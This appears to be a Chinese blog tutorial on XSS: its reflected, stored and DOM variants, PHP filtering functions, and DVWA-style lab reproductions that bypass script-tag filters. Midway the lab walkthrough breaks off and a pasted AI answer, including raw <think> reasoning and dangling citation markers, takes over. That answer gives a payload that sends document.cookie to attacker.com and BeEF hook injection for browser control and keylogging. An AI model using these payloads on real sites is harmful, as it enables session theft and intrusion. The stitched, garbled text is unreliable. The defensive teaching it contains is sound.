XSS漏洞及复现

本文详细介绍了XSS攻击的概念、反射性、存储型和DOM型的分类,以及相应的防范方法,如使用PHP的过滤函数和HTML实体转义。还通过实例展示了如何在PHP代码中实施安全措施防止XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、什么是XSS

跨站脚本( Cross-site Scripting )攻击,攻击者通过网站输入框输入payload(脚本代码 ),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的( 窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML语言中的CSS相混淆,通常称它为“XSS”。

二、XSS的分类

反射性

特点:只执行一次,非持久型

主要存在于攻击者将payload附加到url的参数中,服务端没有经过严格的过滤输出到用户浏览器中,导致恶意代码被执行。

防范思路

可以使用str_replace()函数区分大小写

preg_replace() 利用正则过滤标签(<script>)

htmlspecialchars(string) 将"<",">","&"等转化为html实体,防止浏览器将其作为html元素

靶场复现

输入<script>alert(1)</script>测试发现只输出了alert(1)

查看源码得知,过滤了<script>标签,将script换成大写的SCRIPT,或者将标签换成<img>即可

存储型

特点:持久型

主要存在于攻击者将恶意脚本存储到服务器数据库中,当用户访问包含恶意相关数据的页面时,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。

防范思路

trim(string[,charlist]) 移除字符串两侧的空白字符或预定义字符(\t,\n,\x0B,\r)

stripslashes(string) 移除字符串中的反斜杠

strip_tags(string,allow) 剥去字符串中的html、xml以及php的标签

靶场复现

在尝试<script>alert(1)</script>后,输出为alert(1)

查看源码发现对<script>标签进行了过滤,尝试换成大写或者使用别的标签进行注入

<?php
 
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
 
    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
 
    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
 
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 
    //mysql_close();
}
 
?> 

dom型

特点:通过JavaScript操作document,实现dom树的重构

简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOM型xss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOM型xss也可以理解为反射性xss。

DOM型与反射型和存储型的区别

前面两种都将数据提交到后台处理,但是dom直接在客户端执行

DOM型xss可以在前端通过js渲染来完成数据的交互,达到插入数据造成xss脚本攻击,且不经过服务器,所以即使抓包无无法抓取到这里的流量,而反射性与存储型xss需要与服务器交互,这便是三者的区别。

 靶场复现

url栏里的default参数可修改

查看源代码,发现对<script>标签进行了不区分大小写的查找,并将结果返回为default=English,所以不使用script标签

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
	$default = $_GET['default'];
	
	# Do not allow script tags
	if (stripos ($default, "<script") !== false) {
		header ("location: ?default=English");
		exit;
	}
}

?>

使用img标签后发现并无弹窗

查看网页源代码发现需要闭合标签

重新输入

<think>好的,我需要帮助用户了解如何复现XSS漏洞以进行安全测试。首先,我得整理XSS的基本概念,确保用户明白漏洞的原理。根据提供的引用,XSS分为反射型、存储型和DOM型,这点要明确。 接下来,复现步骤需要详细分点。用户可能需要知道如何搭建测试环境,比如使用PHPStudy或者Docker,引用中的例子提到了本地服务器,可以引用相关部分。然后构造测试Payload,引用里提到了<script>alert(1)</script>和更隐蔽的console.log(1),这些例子需要包含进去,并说明不同场景下的应用。 实例分析部分,用户可能想知道具体的漏洞复现过程。比如反射型XSS,根据引用中的URL示例,需要展示如何构造恶意链接,并解释参数如何触发漏洞。存储型XSS则要举例用户输入如何被保存并显示给其他用户,引用中的PHPmyWind案例可以作为例子,但用户提供的引用中没有详细说明,可能需要参考已有的信息。 工具使用方面,BeEF框架在引用中被提到用于获取Cookie,这部分要介绍工具的作用和基本使用方法,帮助用户了解如何利用工具进行深入利用。 防御措施也是重要的一环,用户可能想知道如何预防XSS,引用中提到输入验证、过滤和转义,需要强调这些方法,并建议使用安全的编码函数。 最后,生成相关问题,确保覆盖用户可能进一步提问的方向,比如不同XSS类型的区别、工具推荐、防御方法以及实际漏洞案例。需要检查引用标记是否正确,每个步骤都自然引用对应的来源,避免遗漏。 整个过程要保持语言简洁,步骤清晰,符合用户要求的格式,使用中文,并且正确应用LaTeX格式。同时注意不要使用Markdown,用自然的分段和标号。检查是否有遗漏的引用,确保每个引用标记对应正确的来源,比如复现步骤中的实例分析引用正确的示例链接。</think>### XSS漏洞复现方法及实例分析 #### 一、XSS漏洞基础 XSS(跨站脚本攻击)通过注入恶意脚本代码到网页中,利用用户浏览器执行非法操作。根据攻击方式可分为以下三类: 1. **反射型XSS**:恶意脚本通过URL参数注入,服务器直接返回未过滤的内容[^1]。 2. **存储型XSS**:恶意脚本存储到服务器数据库,其他用户访问时触发[^2]。 3. **DOM型XSS**:完全由客户端JavaScript解析漏洞导致,不经过服务器处理[^1]。 --- #### 二、复现步骤与实例 ##### 1. 搭建测试环境 - **本地环境**:使用PHPStudy或Docker搭建Web服务器(如引用示例中的`http://localhost:8080`[^3])。 - **目标页面**:选择存在输入输出交互的页面(如留言板、搜索框)。 ##### 2. 构造测试Payload - **基础测试**: ```html <script>alert(1)</script> <!-- 触发弹窗 --> ``` - **隐蔽测试**: ```javascript console.log(1) <!-- 控制台输出,避免弹窗引起注意[^4] --> ``` - **编码绕过**: 使用URL编码或HTML实体编码绕过简单过滤: ```url http://localhost:8080/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 [^3] ``` ##### 3. 实例分析:反射型XSS复现 1. **目标URL**:假设存在搜索功能页面`search.php?keyword=test`。 2. **注入Payload**: ```url http://localhost:8080/search.php?keyword=<script>alert(document.cookie)</script> ``` 3. **触发漏洞**:服务器未过滤参数直接返回页面,脚本执行并泄露Cookie[^5]。 ##### 4. 存储型XSS复现(以留言板为例) 1. **提交恶意内容**: ```html <script>fetch('http://attacker.com/steal?data=' + document.cookie)</script> ``` 2. **持久化存储**:恶意脚本保存到数据库。 3. **其他用户访问**:加载留言时自动发送Cookie到攻击者服务器[^2]。 ##### 5. 工具辅助利用 - **BeEF框架**:用于控制受害者浏览器,执行高级攻击(如截图、键盘记录): ```bash # Kali中启动BeEF beef-xss ``` 注入Payload: ```html <script src="http://<beef_server>:3000/hook.js"></script> ``` --- #### 三、防御措施 1. **输入过滤**:过滤`<script>`、`onerror`等危险标签/属性。 2. **输出转义**:使用HTML实体编码(如`<`转为`<`)[^2]。 3. **CSP策略**:通过HTTP头限制脚本来源。 4. **安全函数**:PHP中可用`htmlspecialchars()`,JavaScript中避免`innerHTML`。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值